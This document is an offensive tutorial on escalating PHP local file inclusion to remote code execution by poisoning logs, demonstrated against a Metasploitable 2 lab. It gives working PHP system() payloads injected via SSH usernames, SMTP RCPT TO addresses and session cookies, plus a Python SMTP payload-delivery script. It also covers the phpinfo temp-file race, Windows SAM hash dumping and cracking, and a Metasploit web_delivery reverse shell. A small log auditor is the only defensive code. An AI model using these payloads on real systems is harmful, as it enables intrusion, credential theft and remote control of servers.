RCE with log poisoning Attack Methodologies
Some of the log files worth trying through the vulnerable parameter are the following:
http://example.com/index.php?page=/var/log/apache/access.log
http://example.com/index.php?page=/var/log/apache/error.log
http://example.com/index.php?page=/var/log/nginx/access.log
http://example.com/index.php?page=/var/log/nginx/error.log
http://example.com/index.php?page=/var/log/vsftpd.log
http://example.com/index.php?page=/var/log/sshd.log
http://example.com/index.php?page=/var/log/auth
http://example.com/index.php?page=/var/log/mail
http://example.com/index.php?page=/var/log/httpd/error_log
http://example.com/index.php?page=/usr/local/apache/log/error_log
http://example.com/index.php?page=/usr/local/apache2/log/error_log
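Before (or after) trying any of those paths it helps to know two things from the defender's side: whether the web-server account can read the file at all, and whether the file already carries PHP tags, i.e. has been poisoned. The script below is an added example, not code from the original page; it walks the candidate list above, judges readability from owner, group and mode bits only (ACLs, capabilities and root are ignored) and flags lines containing a PHP open tag. The user name www-data and the sample log lines in the test are assumptions.

```python
import grp
import os
import pwd
import re
import stat

# The candidate log files listed above.
LOG_CANDIDATES = [
    "/var/log/apache/access.log", "/var/log/apache/error.log",
    "/var/log/nginx/access.log", "/var/log/nginx/error.log",
    "/var/log/vsftpd.log", "/var/log/sshd.log", "/var/log/auth",
    "/var/log/mail", "/var/log/httpd/error_log",
    "/usr/local/apache/log/error_log", "/usr/local/apache2/log/error_log",
]

# A PHP open tag as it would appear in a poisoned entry: "<?php", "<?=" or a
# bare short tag followed by whitespace (so "<?xml" is not flagged), plus the
# URL-encoded form for payloads that arrived in a request line and were logged
# encoded, as in an access log.  PHP tags are case-insensitive.
PHP_TAG = re.compile(r"<\?(?:php|=|\s)|%3C%3F(?:php|=)", re.IGNORECASE)


def readable_by(st, uid, gids):
    """True if a process with this uid and these gids could read a file with
    stat result `st`, judged from owner, group and mode bits only.  POSIX
    ACLs, capabilities and uid 0 are deliberately ignored."""
    if st.st_uid == uid:
        return bool(st.st_mode & stat.S_IRUSR)
    if st.st_gid in gids:
        return bool(st.st_mode & stat.S_IRGRP)
    return bool(st.st_mode & stat.S_IROTH)


def poisoned_lines(lines):
    """(line number, line) for every line that carries a PHP open tag."""
    return [(n, ln) for n, ln in enumerate(lines, 1) if PHP_TAG.search(ln)]


def audit(paths, user="www-data"):
    """For each existing path, report whether `user` can read it and which
    lines already carry PHP tags.  Returns {} if the user does not exist."""
    try:
        pw = pwd.getpwnam(user)
    except KeyError:
        return {}
    gids = {pw.pw_gid} | {g.gr_gid for g in grp.getgrall() if user in g.gr_mem}
    report = {}
    for path in paths:
        try:
            st = os.stat(path)
        except OSError:
            continue   # not present on this box
        entry = {"readable": readable_by(st, pw.pw_uid, gids), "poisoned": []}
        try:
            with open(path, errors="replace") as fh:
                entry["poisoned"] = poisoned_lines(fh)
        except OSError:
            pass       # our own account cannot read it; readability is still reported
        report[path] = entry
    return report


if __name__ == "__main__":
    for path, entry in audit(LOG_CANDIDATES).items():
        flag = "READABLE" if entry["readable"] else "protected"
        print("%-40s %-9s poisoned lines: %d" % (path, flag, len(entry["poisoned"])))
        for n, ln in entry["poisoned"][:5]:
            print("    %d: %s" % (n, ln.rstrip()))
```

Run it on the web host as root so every candidate can be opened; a path reported READABLE for www-data is a usable include target for an attacker, and any poisoned line is evidence that someone has already tried.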
When a web application suffers from local file inclusion (LFI), poisoning a log file that the web server can read and then including it is one of the most reliable ways to turn the LFI into remote code execution. In what follows the target is Metasploitable 2 and the attacking machine runs Kali Linux.
The following steps explain how to perform this from Kali Linux:
Open a terminal on Kali. The target's SSH service is used for the login attempts below, and every attempt, successful or not, is written to the target's auth.log.
First check the permissions of auth.log on the target, because the whole technique depends on the web server's user (www-data) being able to read it:
ls -l /var/log/auth.log
On Metasploitable 2 the file is world-readable and the listing looks like this:
-rw-r--r-- 1 syslog adm ...
On a current Ubuntu or Debian system the default is -rw-r----- with group adm, in which case www-data cannot read the file and this vector does not work; pick another log from the list above.
With read access confirmed, the log can be followed live:
tail -f /var/log/auth.log
Walking through the log, the entries for the user msfadmin (the default Metasploitable 2 account) show what a successful login looks like.
Now attempt to connect with a username that does not exist on the target, for example:
ssh hacker@192.168.1.105
The login is refused:
"Permission denied, please try again."
Go back to auth.log and confirm that the invalid attempt has been recorded. With the attacker connecting from 192.168.1.104 the entry reads:
"Failed password for invalid user hacker from 192.168.1.104 port 56566 ssh2"
So every login attempt, valid or not, ends up in the log, and the username is written into it verbatim. Next, pass PHP code as the username. The attempt has to be quoted so that the shell neither breaks on the inner quotes nor expands $_GET (hence the backslash before the dollar sign):
ssh "<?php system(\$_GET['c']); ?>"@192.168.1.105
Check auth.log again; the PHP code is now stored in the log exactly as typed:
"Failed password for invalid user <?php system($_GET['c']); ?> from 192.168.1.104 port 49642 ssh2"
Assume the vulnerable page (lfi.php, with its include parameter file) is already known; browsing to it with a bogus file name produces the usual include warning that identifies the local file inclusion.
Now include auth.log through that parameter, i.e. file=/var/log/auth.log.
The page dumps the log, and because the poisoned entry is now being executed rather than displayed, PHP emits a warning in its place, roughly:
"Warning: system(): Cannot execute a blank command"
followed by the rest of the entry ("... from 192.168.1.104 port 49642 ssh2").
What this means: the PHP code injected through the SSH username is executed every time auth.log is included, and system() complains only because no c parameter was supplied. Any command can now be passed through c.
Browsing to the include URL with a c parameter dumps auth.log and runs the command given in c. For example:
192.168.1.105/lfi/lfi.php?file=/var/log/auth.log&c=pwd
The output of pwd appears in the page, between the log lines.
Log Poisoning via Mail
The logs tell us the server is running Postfix, and a basic Nmap scan showed port 25 (SMTP) open. The goal is the same as before: get PHP into a log file that the LFI can include, so that the code runs when the page is refreshed. A <?php phpinfo(); ?> line is a good first test; the payload we actually want in the log is:
<?php echo system($_GET["cmd"]); ?>
So how does this string get into Postfix's mail.log? By default Postfix logs the date, the client address and the envelope addresses (MAIL FROM and RCPT TO) of every transaction. Send the target mail with mail, mutt or plain telnet; smtp-user-enum on Kali is also useful for finding valid local users, as long as VRFY has not been disabled in the Postfix configuration.
Look closely at mail.log and you will see that the envelope addresses are logged verbatim, including addresses Postfix rejects. That is all we need: whatever PHP we put into an address ends up in the log and is processed by the include.
The SMTP command flow over telnet starts with:
telnet 192.168.1.107 25
followed by the usual HELO, MAIL FROM, RCPT TO and DATA sequence. The trick is to put the PHP code into the RCPT TO address: Postfix writes a log entry for every recipient it is given, so the payload is added to mail.log as a new entry, exactly as the fake SSH username was added to auth.log.
This is the log poisoning stage. Including mail.log through the LFI now dumps the log and executes the command passed in cmd; for example cmd=ifconfig prints the target's network interfaces in the middle of the log dump, which confirms the execution.
In some cases the mail command is enough, with the payload in the subject line (this only reaches mail.log when the server is configured to log message headers, for example through header_checks):
mail -s "<?php system(\$_GET['cmd']);?>" [email protected] < /dev/null
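The telnet session described above, as an added example that is not part of the original page: the client lines of one SMTP transaction with the page's payload as the local part of the RCPT TO address, a reply reader that understands multi-line 250- responses, and a sender that stops after the first 5xx, since by then Postfix has already written the rejected address to mail.log. The HELO name, sender address and the localhost recipient domain are assumptions.

```python
import socket

PAYLOAD = "<?php echo system($_GET['cmd']); ?>"   # the page's final payload


def smtp_dialogue(payload=PAYLOAD, helo="kali", sender="attacker@kali",
                  domain="localhost"):
    """Client lines of one transaction, in order.  The payload is the local
    part of the RCPT TO address because Postfix logs to=<...> for every
    recipient, accepted or rejected.  The message text follows DATA and ends
    with the lone '.' terminator; the mailbox itself is irrelevant."""
    return [
        "HELO %s" % helo,
        "MAIL FROM:<%s>" % sender,
        "RCPT TO:<%s@%s>" % (payload, domain),
        "DATA",
        "Subject: test\r\n\r\nlog poisoning\r\n.",
        "QUIT",
    ]


def read_reply(fh):
    """Read one SMTP reply from a text stream.  Intermediate lines have '-'
    after the three-digit code ('250-PIPELINING'); the final line has a
    space.  Returns (code, lines)."""
    lines = []
    while True:
        line = fh.readline()
        if not line:
            raise EOFError("connection closed")
        line = line.rstrip("\r\n")
        lines.append(line)
        if len(line) < 4 or line[3] != "-":
            return line[:3], lines


def send_dialogue(host, port=25, lines=None, timeout=10):
    """Run the dialogue against a live server and return [(sent, code, reply)]
    for every exchange, the greeting first.  Sending stops after a 5xx (a
    rejected recipient, say) but the session is still closed with QUIT."""
    lines = lines or smtp_dialogue()
    log = []
    with socket.create_connection((host, port), timeout=timeout) as sock:
        rf = sock.makefile("r", encoding="utf-8", errors="replace", newline="")
        code, reply = read_reply(rf)            # 220 greeting
        log.append(("", code, reply))
        for sent in lines:
            sock.sendall((sent + "\r\n").encode("utf-8"))
            code, reply = read_reply(rf)
            log.append((sent, code, reply))
            if code.startswith("5") and sent != "QUIT":
                sock.sendall(b"QUIT\r\n")
                break
    return log


if __name__ == "__main__":
    for sent, code, reply in send_dialogue("192.168.1.107"):   # target from the page
        print("C: %s" % sent if sent else "C: (connect)")
        print("S: %s" % " / ".join(reply))
```

Whether the recipient is accepted or answered with 501 Bad recipient address syntax, the address text is in mail.log afterwards; a 5xx on RCPT TO is therefore not a failure of the poisoning step.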
Check whether the website uses PHP sessions, i.e. sets a PHPSESSID cookie. The response headers may look like this:
Set-Cookie: PHPSESSID=i56kgbsq9rm8ndg3qbarhsbm27; path=/
Set-Cookie: user=admin; expires=Mon, 13-Aug-2018 20:21:29 GMT; path=/; httponly
PHP stores these sessions on disk, in /var/lib/php5/sess_[PHPSESSID] on PHP 5 systems (/var/lib/php/sessions/sess_[PHPSESSID] on PHP 7 and later, or wherever session.save_path points). Any value the application saves into $_SESSION is written to that file, serialized but otherwise verbatim.
So set a value the application stores in the session, such as the user cookie, to:
<?php system('cat /etc/passwd');?>
or submit it through the login form, if that is where the user value comes from:
login=1&user=<?php system("cat /etc/passwd");?>&pass=password&lang=en_us.php
Then use the LFI to include the session file, here /var/lib/php5/sess_i56kgbsq9rm8ndg3qbarhsbm27; PHP executes the code it finds inside the serialized value.
LFI to RCE via phpinfo()
phpinfo() displays the content of the request superglobals, including $_GET, $_POST and $_FILES. For a multipart upload, $_FILES contains the temporary file name (tmp_name) under which PHP has stored the upload, and that file exists only until the request finishes.
By making multiple upload POSTs to the phpinfo script, and carefully controlling the reads so that the temporary file name is parsed out of the response while the upload request is still being processed, it is possible to retrieve the name of the temporary file and make a request to the LFI script specifying that name before PHP deletes it.
Use the script phpInfoLFI.py (also available at https://www.insomniasec.com/downloads/publications/phpinfolfi.py).
On Windows targets the same inclusion can be used to read the registry hives, provided the web server runs with privileges high enough to read them. With the SAM and SYSTEM hives retrieved, extract the hashes:
samdump2 SYSTEM SAM > hashes.txt
and crack them with hashcat or john, or replay them with the Pass-the-Hash technique.
To get a shell instead of running single commands, Metasploit's web_delivery module generates a PHP one-liner that fetches and runs a Meterpreter stage; that one-liner is what gets passed in the command parameter. Inside Metasploit:
use exploit/multi/script/web_delivery
msf exploit(web_delivery) > set target 1
msf exploit(web_delivery) > set payload php/meterpreter/reverse_tcp
msf exploit(web_delivery) > set lhost 192.168.1.109
msf exploit(web_delivery) > set lport 8888
msf exploit(web_delivery) > exploit
Target 1 is the PHP target; lhost and lport are the attacker's listener.